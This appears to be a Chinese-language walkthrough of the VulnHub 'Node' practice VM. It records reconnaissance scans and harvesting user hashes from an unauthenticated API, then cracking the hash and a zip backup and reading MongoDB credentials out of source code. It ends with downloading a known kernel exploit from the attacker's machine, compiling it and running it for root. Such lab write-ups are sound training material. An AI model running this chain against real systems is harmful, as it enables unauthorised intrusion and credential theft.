Node 靶机
靶机下载: https://www.vulnhub.com/entry/node-1,252/
渗透目标是通过 VMWare 安装的 Node 虚拟机, 网络连接方式为仅主机, 目标 IP 通过 DHCP 分配
主机发现
[[email protected] ~]# arp-scan -I eth0 -l
端口探测
[[email protected] ~]# nmap -sS -p1-65535 -v 192.168.64.129
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
服务识别
[[email protected] ~]# nmap -sV -T4 -p22,3000 192.168.64.129
查找漏洞
扫描目录
[[email protected] ~]# dirb http://192.168.64.129:3000 -f ~/web_file_list.txt
没有扫描到 web 目录
使用BurpSuite 探测
获取到 http://192.168.64.129:3000/api/users/latest 中 JSON 格式的用户数据
尝试去掉 latest, 在 http://192.168.64.129:3000/api/users/ 中发现了管理员用户
尝试破解密码
[[email protected] ~]# hash-identifier dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
Possible Hashs:
[+] SHA-256
[+] Haval-256
Least Possible Hashs:
[+] GOST R 34.11-94
[+] RipeMD-256
[+] SNEFRU-256
[+] SHA-256(HMAC)
[+] Haval-256(HMAC)
[+] RipeMD-256(HMAC)
[+] SNEFRU-256(HMAC)
[+] SHA-256(md5($pass))
[+] SHA-256(sha1($pass))
SHA-256 在线解密 https://md5decrypt.net/Sha256/
用管理员登录
管理员登录后可以下载备份文件
尝试解密备份
文件内容为 ASCII 文本, 预览后疑似 BASE64 编码
[[email protected] ~]# file myplace.backup
myplace.backup: ASCII text, with very long lines, with no line terminators
尝试 BASE64 解码, 得到 zip 压缩包, 但是解压需要密码
[[email protected] ~]# cat myplace.backup | bash64 -d > myplace.bak
[[email protected] ~]# file myplace.bak
myplace.bak: Zip archive data, at least v1.0 to extract
尝试破解压缩包密码
[[email protected] ~]# fcrackzip -v -b -u -c a -p magicaaaa myplace.bak
... ...
PASSWORD FOUND!!!!: pw == magicword
解压后寻找可用信息
[[email protected] ~]# unzip myplace.bak
[[email protected] ~]# more var/www/myplace/app.js
... ...
const url = 'mongodb://mark:[email protected]:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
... ...
尝试使用 MongoDB 用户 ssh 登录
[[email protected] ~]# ssh [email protected] #密码:5AYRft73VtFpc84k
[[email protected] ~]$ uname -a
Linux node 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
[[email protected] ~]$ cat /etc/issue
Ubuntu 16.04.3 LTS \n \l
漏洞提权
[[email protected] ~]# searchsploit Ubuntu 16.04
发现漏洞提权代码
将提权代码传到靶机
[[email protected] ~]# systemctl start apache2.service
[[email protected] ~]# cp /usr/share/exploitdb/exploits/linux/local/44298.c /var/www/html/
[[email protected] /tmp]$ wget http://192.168.64.128/44298.c
#192.168.64.128 为 Kali 虚拟机 IP
[[email protected] /tmp]$ gcc 44298.c -o exp
[[email protected] /tmp]$ ./exp
[[email protected] /tmp]# whoami
root